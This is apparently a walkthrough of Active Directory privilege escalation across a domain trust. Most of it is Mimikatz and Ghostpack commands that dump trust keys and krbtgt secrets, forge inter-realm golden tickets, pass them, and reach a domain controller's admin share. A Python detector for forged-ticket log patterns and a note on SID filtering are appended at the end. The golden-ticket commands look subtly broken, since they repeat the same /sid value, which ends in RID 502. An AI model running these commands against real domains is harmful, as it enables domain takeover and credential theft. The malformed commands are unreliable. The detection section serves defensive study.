Privilege Escalation Across Trust

Priv esc across domains: trust tickets:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::trust /patch"'

An inter-realm TGT can be forged:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi"'

Request a service ticket (TGS) for a service (CIFS below) in the target domain by presenting the forged trust ticket:

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local

Use the TGS to access the targeted service:

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> .\kirbikator.exe lsa .\CIFS.WIN-2RUMVG5JPOC.security.local.kirbi

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> ls \\WIN-2RUMVG5JPOC.security.local

Priv esc across domains: krbtgt hash:

SID history once again:

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> Invoke-Mimikatz -Command '"kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi"'

On a machine in the security domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

We now have Enterprise Admin privileges:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration>ls //WIN-2RUMVG5JPOC.security.local\c$
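Both procedures above (the trust-key ticket and the krbtgt-hash ticket) leave the same trace on the target domain's DCs: a service ticket request (event 4769) for a principal that never went through an AS exchange there (no event 4768), and a ticket cut with an RC4 key (TicketEncryptionType 0x17) where AES is the norm. The following detector is an added example, not code from the original post; the key=value log layout and the sample records are constructed for the demo, and the hostname is the one used on this page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample DC security-log lines (not real telemetry). The key=value
# layout is an assumption for this demo; field names follow the 4768/4769 schema.
SAMPLE_LOG = """\
2024-01-10T09:00:00 EventID=4768 TargetUserName=alice TargetDomainName=CHILD.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.5
2024-01-10T09:00:02 EventID=4769 TargetUserName=alice@CHILD.LOCAL TargetDomainName=CHILD.LOCAL ServiceName=CIFS/fs01.child.local TicketEncryptionType=0x12 IpAddress=10.0.0.5
2024-01-10T09:15:00 EventID=4769 TargetUserName=administrator@SECURITY.LOCAL TargetDomainName=SECURITY.LOCAL ServiceName=CIFS/WIN-2RUMVG5JPOC.security.local TicketEncryptionType=0x17 IpAddress=10.0.0.77
"""

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_events(text):
    """Turn one log line per event into dicts with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.partition(" ")
        ev = dict(FIELD.findall(rest))
        ev["ts"] = datetime.fromisoformat(ts)
        ev["EventID"] = int(ev["EventID"])
        # 4769 records the client as user@REALM; normalise to the bare principal
        ev["principal"] = ev["TargetUserName"].split("@")[0].lower()
        events.append(ev)
    return events

def find_suspicious_tgs(events, window=timedelta(hours=10)):
    """Flag 4769 records that have no 4768 for the same principal within the
    window (a forged TGT never touches the AS exchange) or that were issued
    with RC4 (0x17), which is what a ticket built from an RC4 trust key or
    krbtgt hash looks like in an AES-only domain."""
    tgts = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4768:
            tgts[(ev["principal"], ev["TargetDomainName"].upper())].append(ev["ts"])
    findings = []
    for ev in events:
        if ev["EventID"] != 4769:
            continue
        key = (ev["principal"], ev["TargetDomainName"].upper())
        reasons = []
        if not any(ev["ts"] - window <= t <= ev["ts"] for t in tgts[key]):
            reasons.append("no 4768 TGT request for principal within window")
        if ev["TicketEncryptionType"].lower() == "0x17":
            reasons.append("RC4 (0x17) ticket where AES is expected")
        if reasons:
            findings.append((ev["ServiceName"], ev["IpAddress"], reasons))
    return findings

if __name__ == "__main__":
    for svc, ip, why in find_suspicious_tgs(parse_events(SAMPLE_LOG)):
        print(f"{svc} from {ip}: {'; '.join(why)}")
```

The 4768/4769 correlation only works when logs from every DC in the forest are collected centrally, because a cross-domain user's legitimate TGT is issued by the home domain's DC, not the target's. SID filtering on the trust is the control that blocks the SID-history injection relied on above.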

@Saksham Dixit